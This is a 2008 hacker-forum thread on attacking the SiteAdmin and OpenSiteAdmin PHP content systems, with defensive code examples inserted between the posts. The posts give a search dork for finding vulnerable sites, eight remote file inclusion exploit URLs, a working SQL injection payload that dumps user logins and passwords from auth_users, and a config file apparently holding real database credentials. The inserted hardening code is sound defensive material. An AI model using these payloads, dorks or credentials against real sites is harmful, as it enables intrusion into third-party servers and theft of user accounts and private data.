SiteAdmin

Discussion in 'Web vulnerabilities' started by halkfild, 3 Jul 2008.

  1. halkfild

    halkfild Members of Antichat

    SiteAdmin

    site: http://as-admin.com
    version: the latest one from the official site; if what is written in the scripts is to be believed, v.1.4
    dork: inurl:line2.php for the version without mod_rewrite, and something similar for the version with mod_rewrite


    vulnerability in the file cnews.lib.php

    PHP:
    function printInfo($tpl, $index='', $other_limit=0) {
            if(!$this->active) return;
            $id=getParm('art');
            if(!$index) $index=$this->url_self;
            if(!$id) return;
            // $id is taken straight from the request and concatenated into the query
            $sql="select * from {$this->info_table} info where info.news_id=$id";
            $res=mysql_query($sql) or print(mysql_error());
            if (@mysql_num_rows($res)) {
    .................................................................
    where the getParm function in the file common.lib.php is:

    PHP:
    function getParm($var_name, $def_val='', $type='', $max=8064)
     {  if(!isset($GLOBALS['uri_set'])||!$GLOBALS['uri_set'])
        return sGetParm($var_name, $def_val, $type, $max);
         switch (strtoupper($type)) {
             //GET
             case 'G': $var=isset($_GET["$var_name"])?$_GET["$var_name"]:(isset($HTTP_GET_VARS["$var_name"])?$HTTP_GET_VARS["$var_name"]:$def_val); $max=min($max,255); break;
             //POST
             case 'P': $var=isset($_POST["$var_name"])?$_POST["$var_name"]:(isset($HTTP_POST_VARS["$var_name"])?$HTTP_POST_VARS["$var_name"]:$def_val); break;
             //COOKIE
             case 'C': $var=isset($_COOKIE["$var_name"])?$_COOKIE["$var_name"]:(isset($HTTP_COOKIE_VARS["$var_name"])?$HTTP_COOKIE_VARS["$var_name"]:$def_val); break;
             //FILES
             case 'F': $var=isset($_FILES["$var_name"])?$_FILES["$var_name"]:(isset($HTTP_POST_FILES["$var_name"])?$HTTP_POST_FILES["$var_name"]:$def_val); break;
             //SESSION
             case 'S': $var=isset($_SESSION["$var_name"])?$_SESSION["$var_name"]:(isset($HTTP_SESSION_VARS["$var_name"])?$HTTP_SESSION_VARS["$var_name"]:$def_val); break;
             //ENV
             case 'E': $var=isset($_ENV["$var_name"])?$_ENV["$var_name"]:(isset($HTTP_ENV_VARS["$var_name"])?$HTTP_ENV_VARS["$var_name"]:$def_val); break;
             //ALL (EXCEPT SESSION & ENV)
             default: $var=isset($_REQUEST["$var_name"])?$_REQUEST["$var_name"]:$def_val;
         }
        // the only processing is length truncation; the value is never escaped or type-checked
        if(!is_array($var) && strlen($var)>$max) { $var=substr($var,0,$max); }
        return $var;
     }
    in short, no filtering at all..

    next

    there is a settings file here

    P.S.

    from the official site


    config

    PHP:
    /*        Configuration file for "Test"
    *        Created by STM-studio stm.dp.ua@gmail.com
    *        v.1.4
    */
    $cfg['mysql_server']    ='localhost';
    $cfg['mysql_database']    ='as-admin';
    $cfg['mysql_user']        ='tarasua';
    $cfg['mysql_spassword']    ='1508SuperKap';

    $cfg['prefix']    ='sa';       //Database table prefix
    $cfg['lang']    ='ru,ua,en';   //Available site languages
     
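As an added example (not code from SiteAdmin or from the post above), this is the same news-info lookup with the 'art' parameter validated as a positive integer and passed to MySQL as a bound parameter instead of being interpolated into the SQL string. It assumes PHP 7.1+ with mysqli (mysqlnd for get_result()) and the hypothetical names $this->db, artIdFromRequest() and fetchInfoRow().

```php
<?php
// Added example: hardened replacement for the printInfo() query in cnews.lib.php.
// The original builds "... where info.news_id=$id" from the raw request value;
// here the id must be a plain integer >= 1 and is bound, never concatenated.

function artIdFromRequest(array $request): ?int
{
    // Reject arrays and anything that is not a decimal integer, so a value such
    // as "16 limit 0 union select ..." never reaches the query at all.
    if (!isset($request['art']) || is_array($request['art'])) {
        return null;
    }
    $id = filter_var($request['art'], FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function fetchInfoRow(mysqli $db, string $infoTable, int $id): ?array
{
    // $infoTable comes from the application's own config, not from the request;
    // it is quoted as an identifier because it cannot be a bound parameter.
    $table = '`' . str_replace('`', '``', $infoTable) . '`';
    $stmt = $db->prepare("SELECT * FROM $table info WHERE info.news_id = ?");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('i', $id);   // 'i' binds the value as an integer
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage inside printInfo() (hypothetical $this->db is a mysqli connection):
//   $id = artIdFromRequest($_GET);
//   if ($id === null) return;            // same early exit as the original
//   $info = fetchInfoRow($this->db, $this->info_table, $id);
```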
  2. FraiDex

    FraiDex Elder

    OpenSiteAdmin <= 0.9.1.1 Multiple File Inclusion Vulnerabilities
    Vulnerable Code:
    PHP:
    -OpenSiteAdmin/indexFooter.php
    require_once($path."footer.php");

    -OpenSiteAdmin/scripts/classes/DatabaseManager.php
    require_once($path."OpenSiteAdmin/include.php");
    require_once($path."OpenSiteAdmin/scripts/classes/ErrorLogManager.php");

    -OpenSiteAdmin/scripts/classes/FieldManager.php
    require_once($path."OpenSiteAdmin/scripts/classes/Fields/Checkbox.php");
    require_once($path."OpenSiteAdmin/scripts/classes/Fields/ForeignKey.php");
    .....
    ..

    -OpenSiteAdmin/scripts/classes/Filter.php
    require_once($path."OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php");

    -OpenSiteAdmin/scripts/classes/Form.php
    require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_List.php");
    require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_Single.php");

    -OpenSiteAdmin/scripts/classes/FormManager.php
    require_once($path."OpenSiteAdmin/scripts/classes/Form.php");

    -OpenSiteAdmin/scripts/classes/LoginManager.php
    require_once($path."OpenSiteAdmin/scripts/classes/SecurityManager.php");

    -OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php
    require_once($path."OpenSiteAdmin/scripts/classes/RowManager.php");
    Exploit:
    Code:
    http://www.vulnerable.com/OpenSiteAdmin/indexFooter.php?path=<File Inclusion>%00
    http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=<File Inclusion>%00
    http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FieldManager.php?path=<File Inclusion>%00
    http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filter.php?path=<File Inclusion>%00
    http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Form.php?path=<File Inclusion>%00
    http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FormManager.php?path=<File Inclusion>%00
    http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/LoginManager.php?path=<File Inclusion>%00
    http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=<File Inclusion>%00
    (c)milw0rm.com
     
    #2 FraiDex, 4 Jul 2008
    Last edited: 4 Jul 2008
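As an added example (not OpenSiteAdmin code and not from the advisory above), this is a safe replacement for the require_once($path."footer.php") pattern: the base directory is fixed to the script's own location instead of an unchecked $path, and the resolved file must stay inside it. The function name safeRequire() is hypothetical; it assumes PHP 7.0+.

```php
<?php
// Added example: include helper that cannot be steered by a request parameter.
// The vulnerable files concatenate $path, which an attacker controls, with a
// file name; here the base is derived from __DIR__ and the final path is
// checked with realpath() so null bytes, ".." and absolute paths are rejected.

function safeRequire(string $baseDir, string $relative): void
{
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('base directory does not exist');
    }
    // Fail closed on a null byte or any traversal component before touching disk.
    if (strpos($relative, "\0") !== false || strpos($relative, '..') !== false) {
        throw new RuntimeException('invalid include name');
    }
    $target = realpath($base . DIRECTORY_SEPARATOR . $relative);
    // realpath() resolves symlinks and normalises the path; the result must
    // still begin with "<base>/" or the include is refused.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($target === false || strncmp($target, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('include outside application directory');
    }
    require_once $target;
}

// indexFooter.php equivalent: the base is this script's directory and is never
// read from $_GET, $_REQUEST or a register_globals variable named $path.
safeRequire(__DIR__, 'footer.php');
```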
  3. Twiddle

    Twiddle Elder

    Scanned it today with a scanner and it found 57 injections!
    We use:
    Code:
    xxx.com/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,user_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    AWVS4 report
    Code:
    http://rapidshare.com/files/132908385/__1057___1080___1089___1090___1077___1084___1072____1091___1087___1088___1072___1074___1083___1077__.html
    And a bonus:
